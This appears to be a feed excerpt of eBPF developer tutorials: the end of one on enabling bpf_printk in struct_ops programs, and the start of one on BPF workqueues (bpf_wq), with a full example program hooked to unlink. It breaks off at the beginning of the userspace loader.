&lt;p&gt;&lt;strong&gt;Symptom:&lt;/strong&gt; The userspace loader fails with an error indicating that a BPF helper function is not allowed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;libbpf: prog 'bpf_testmod_test_1': BPF program load failed: Invalid argument
program of this type cannot use helper bpf_trace_printk#6
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; BPF programs of type &lt;code&gt;struct_ops&lt;/code&gt; run in a different kernel context than tracing programs (like kprobes or tracepoints). As a result, they are subject to a different, often more restrictive, set of allowed helper functions. The &lt;code&gt;bpf_trace_printk&lt;/code&gt; helper (which &lt;code&gt;bpf_printk&lt;/code&gt; is a macro for) is a tracing helper and is not allowed by default in &lt;code&gt;struct_ops&lt;/code&gt; programs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; While you can't use &lt;code&gt;bpf_printk&lt;/code&gt; by default, you can explicitly allow it for your &lt;code&gt;struct_ops&lt;/code&gt; type. This is done in the kernel module by implementing the &lt;code&gt;.get_func_proto&lt;/code&gt; callback in your &lt;code&gt;bpf_verifier_ops&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// In module/hello.c&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_func_proto&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;
&lt;span class="nf"&gt;bpf_testmod_ops_get_func_proto&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;bpf_func_id&lt;/span&gt; &lt;span class="n"&gt;func_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_prog&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Use base func proto which includes trace_printk and other basic helpers */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bpf_base_func_proto&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;func_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_verifier_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;is_valid_access&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_is_valid_access&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get_func_proto&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_get_func_proto&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// Add this line&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;bpf_base_func_proto&lt;/code&gt; function provides access to a set of common, basic helpers, including &lt;code&gt;bpf_trace_printk&lt;/code&gt;. By adding this to our verifier operations, we tell the BPF verifier that programs attached to &lt;code&gt;bpf_testmod_ops&lt;/code&gt; are permitted to use these helpers. This makes debugging with &lt;code&gt;bpf_printk&lt;/code&gt; possible.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;In this tutorial, we explored the powerful capabilities of BPF &lt;code&gt;struct_ops&lt;/code&gt; by moving beyond common examples. We demonstrated a robust pattern for extending the kernel: creating a minimal kernel module to define a new, BPF-programmable subsystem interface, and then providing the full, complex implementation in a safe, updatable BPF program. This approach combines the extensibility of kernel modules with the safety and flexibility of eBPF.&lt;/p&gt;

&lt;p&gt;We saw how the kernel module registers a &lt;code&gt;struct_ops&lt;/code&gt; type, how the BPF program implements the required functions, and how a userspace loader attaches this implementation and triggers its execution. This architecture opens the door to implementing a wide range of kernel-level features in BPF, from custom network protocols and security policies to new filesystem behaviors, all while maintaining system stability and avoiding the need to recompile the kernel.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kernel Source for &lt;code&gt;struct_ops&lt;/code&gt;&lt;/strong&gt;: The implementation can be found in &lt;code&gt;kernel/bpf/bpf_struct_ops.c&lt;/code&gt; in the Linux source tree.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kernel Test Module for &lt;code&gt;struct_ops&lt;/code&gt;&lt;/strong&gt;: The official kernel self-test module provides a reference implementation: &lt;code&gt;tools/testing/selftests/bpf/test_kmods/bpf_testmod.c&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;BPF Documentation&lt;/strong&gt;: The official BPF documentation in the kernel source: &lt;a href="https://www.kernel.org/doc/html/latest/bpf/" rel="noopener noreferrer"&gt;https://www.kernel.org/doc/html/latest/bpf/&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ebpf</category>
      <category>structops</category>
      <category>kernel</category>
    </item>
    <item>
      <title>eBPF Tutorial: BPF Workqueues for Asynchronous Sleepable Tasks</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 20 Jan 2026 07:20:47 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-bpf-workqueues-for-asynchronous-sleepable-tasks-58nb</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-bpf-workqueues-for-asynchronous-sleepable-tasks-58nb</guid>
      <description>&lt;p&gt;Ever needed your eBPF program to sleep, allocate memory, or wait for device I/O? Traditional eBPF programs run in restricted contexts where blocking operations crash the system. But what if your HID device needs timing delays between injected key events, or your cleanup routine needs to sleep while freeing resources?&lt;/p&gt;

&lt;p&gt;This is what &lt;strong&gt;BPF Workqueues&lt;/strong&gt; enable. Created by Benjamin Tissoires at Red Hat in 2024 for HID-BPF device handling, workqueues let you schedule asynchronous work that runs in process context where sleeping and blocking operations are allowed. In this tutorial, we'll explore why workqueues were created, how they differ from timers, and build a complete example demonstrating async callback execution.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF Workqueues: Solving the Sleep Problem
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: When eBPF Can't Sleep
&lt;/h3&gt;

&lt;p&gt;Before BPF workqueues existed, developers had &lt;code&gt;bpf_timer&lt;/code&gt; for deferred execution. Timers work great for scheduling callbacks after a delay, perfect for updating counters or triggering periodic events. But there's a fundamental limitation that made timers unusable for certain critical use cases: &lt;strong&gt;bpf_timer runs in softirq (software interrupt) context&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Softirq context has strict rules enforced by the kernel. You cannot sleep or wait for I/O - any attempt to do so will cause kernel panics or deadlocks. You cannot allocate memory using &lt;code&gt;kzalloc()&lt;/code&gt; with &lt;code&gt;GFP_KERNEL&lt;/code&gt; flag because memory allocation might need to wait for pages. You cannot communicate with hardware devices that require waiting for responses. Essentially, you cannot perform any blocking operations that might cause the CPU to wait.&lt;/p&gt;

&lt;p&gt;This limitation became a real problem for Benjamin Tissoires at Red Hat when he was developing HID-BPF in 2023. HID devices (keyboards, mice, tablets, game controllers) frequently need operations that timers simply can't handle. Imagine implementing keyboard macro functionality where pressing F1 types "hello" - you need 10ms delays between each keystroke for the system to properly process events. Or consider a device with buggy firmware that needs re-initialization after system wake - you must send commands and wait for hardware responses. Timer callbacks in softirq context can't do any of this.&lt;/p&gt;

&lt;p&gt;As Benjamin Tissoires explained in his kernel patches: "I need something similar to bpf_timers, but not in soft IRQ context... the bpf_timer functionality would prevent me to kzalloc and wait for the device."&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Process Context Execution
&lt;/h3&gt;

&lt;p&gt;In early 2024, Benjamin proposed and developed &lt;strong&gt;bpf_wq&lt;/strong&gt; - essentially "bpf_timer but in process context instead of softirq." The kernel community merged it into Linux v6.10+ in April 2024. The key insight is simple but powerful: by running callbacks in process context (through the kernel's workqueue infrastructure), BPF programs gain access to the full range of kernel operations.&lt;/p&gt;

&lt;p&gt;Here's what changes with process context:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;bpf_timer (softirq)&lt;/th&gt;
&lt;th&gt;bpf_wq (process)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Can sleep?&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ No - will crash&lt;/td&gt;
&lt;td&gt;✅ Yes - safe to sleep&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Memory allocation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Limited flags only&lt;/td&gt;
&lt;td&gt;✅ Full &lt;code&gt;kzalloc()&lt;/code&gt; support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Device I/O&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Cannot wait&lt;/td&gt;
&lt;td&gt;✅ Can wait for responses&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Blocking operations&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Prohibited&lt;/td&gt;
&lt;td&gt;✅ Fully supported&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Latency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Very low (microseconds)&lt;/td&gt;
&lt;td&gt;Higher (milliseconds)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Use case&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Time-critical fast path&lt;/td&gt;
&lt;td&gt;Sleepable slow path&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Workqueues enable the classic "fast path + slow path" pattern. Your eBPF program handles performance-critical operations immediately in the fast path, then schedules expensive cleanup or I/O operations to run asynchronously in the slow path. The fast path stays responsive while the slow path gets the capabilities it needs.&lt;/p&gt;

&lt;h3&gt;
  
  
  Real-World Applications
&lt;/h3&gt;

&lt;p&gt;The applications span multiple domains. &lt;strong&gt;HID device handling&lt;/strong&gt; was the original motivation - injecting keyboard macros with timing delays, fixing broken device firmware dynamically without kernel drivers, re-initializing devices after wake from sleep, transforming input events on the fly. All these require sleepable operations that only workqueues can provide.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Network packet processing&lt;/strong&gt; benefits from async cleanup patterns. Your XDP program enforces rate limits and drops packets in the fast path (non-blocking), while a workqueue cleans up stale tracking entries in the background. This prevents memory leaks without impacting packet processing performance.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Security monitoring&lt;/strong&gt; can apply fast rules immediately, then use workqueues to query reputation databases or external threat intelligence services. The fast path makes instant decisions while the slow path updates policies based on complex analysis.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Resource cleanup&lt;/strong&gt; defers expensive operations. Instead of blocking the main code path while freeing memory, closing connections, or compacting data structures, you schedule a workqueue to handle cleanup in the background.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation: Simple Workqueue Test
&lt;/h2&gt;

&lt;p&gt;Let's build a complete example that demonstrates the workqueue lifecycle. We'll create a program that triggers on the &lt;code&gt;unlink&lt;/code&gt; syscall, schedules async work, and verifies that both the main path and workqueue callback execute correctly.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete BPF Program: wq_simple.bpf.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Simple BPF workqueue example */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"bpf_experimental.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* Element with embedded workqueue */&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_wq&lt;/span&gt; &lt;span class="n"&gt;work&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="cm"&gt;/* Array to store our element */&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;array&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="cm"&gt;/* Result variables */&lt;/span&gt;
&lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;wq_executed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;main_executed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* Workqueue callback - runs asynchronously in workqueue context */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;wq_callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;map&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="cm"&gt;/* This runs later in workqueue context */&lt;/span&gt;
    &lt;span class="n"&gt;wq_executed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* Modify the value asynchronously */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Main program - schedules work */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"fentry/do_unlinkat"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;test_workqueue&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="n"&gt;init&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_wq&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;wq&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;main_executed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Initialize element in map */&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;init&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Get element from map */&lt;/span&gt;
    &lt;span class="n"&gt;val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Initialize workqueue */&lt;/span&gt;
    &lt;span class="n"&gt;wq&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;work&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_wq_init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;wq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Set callback function */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_wq_set_callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;wq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;wq_callback&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Schedule work to run asynchronously */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_wq_start&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;wq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the BPF Code
&lt;/h3&gt;

&lt;p&gt;The program demonstrates the complete workqueue workflow from initialization through async execution. We start by defining a structure that embeds a workqueue. The &lt;code&gt;struct elem&lt;/code&gt; contains both application data (&lt;code&gt;value&lt;/code&gt;) and the workqueue handle (&lt;code&gt;struct bpf_wq work&lt;/code&gt;). This embedding pattern is critical - the workqueue infrastructure needs to know which map contains the workqueue structure, and embedding it in the map value establishes this relationship.&lt;/p&gt;

&lt;p&gt;Our map is a simple array with one entry, chosen for simplicity in this example. In production code, you'd typically use hash maps to track multiple entities, each with its own embedded workqueue. The global variables &lt;code&gt;wq_executed&lt;/code&gt; and &lt;code&gt;main_executed&lt;/code&gt; serve as test instrumentation, letting userspace verify that both code paths ran.&lt;/p&gt;

&lt;p&gt;The workqueue callback shows the signature that all workqueue callbacks must follow: &lt;code&gt;int callback(void *map, int *key, void *value)&lt;/code&gt;. The kernel invokes this function asynchronously in process context, passing the map containing the workqueue, the key of the entry, and a pointer to the value. This signature gives the callback full context about which element triggered it and access to the element's data. Our callback sets &lt;code&gt;wq_executed = 1&lt;/code&gt; to prove it ran, and modifies &lt;code&gt;val-&amp;gt;value = 42&lt;/code&gt; to demonstrate that async modifications persist in the map.&lt;/p&gt;

&lt;p&gt;The main program attached to &lt;code&gt;fentry/do_unlinkat&lt;/code&gt; triggers whenever the &lt;code&gt;unlink&lt;/code&gt; syscall executes. This gives us an easy way to activate the program - userspace just needs to delete a file. We set &lt;code&gt;main_executed = 1&lt;/code&gt; immediately to mark the synchronous path. Then we initialize an element and store it in the map using &lt;code&gt;bpf_map_update_elem()&lt;/code&gt;. This is necessary because the workqueue must be embedded in a map entry.&lt;/p&gt;

&lt;p&gt;The workqueue initialization follows a three-step sequence. First, &lt;code&gt;bpf_wq_init(wq, &amp;amp;array, 0)&lt;/code&gt; initializes the workqueue handle, passing the map that contains it. The verifier uses this information to validate that the workqueue and its container are properly related. Second, &lt;code&gt;bpf_wq_set_callback(wq, wq_callback, 0)&lt;/code&gt; registers our callback function. The verifier checks that the callback has the correct signature. Third, &lt;code&gt;bpf_wq_start(wq, 0)&lt;/code&gt; schedules the workqueue to execute asynchronously. This call returns immediately - the main program continues executing while the kernel queues the work for later execution in process context.&lt;/p&gt;

&lt;p&gt;The flags parameter in all three functions is reserved for future use and should be 0 in current kernels. The pattern allows future extensions without breaking API compatibility.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete User-Space Program: wq_simple.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Userspace test for BPF workqueue */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
